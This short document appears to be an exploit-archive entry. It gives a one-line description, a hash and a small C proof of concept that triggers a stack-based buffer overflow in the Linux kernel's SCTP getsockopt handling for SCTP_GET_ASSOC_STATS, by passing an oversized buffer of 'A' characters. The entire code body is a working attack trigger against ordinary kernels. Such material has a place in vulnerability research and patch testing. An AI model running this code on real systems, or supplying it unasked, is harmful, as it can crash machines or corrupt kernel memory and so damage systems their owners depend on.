Proof of concept code that demonstrates a stack-based buffer overflow in the Linux kernel SCTP_GET_ASSOC_STATS() function.
588169341383534eb48214aef23de1ecd3b8f43f820fc7090163879acbcb9dc3
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132
int main(void)
{
char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
socklen_t len = strlen(buf);
int fd;
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
return 0;
}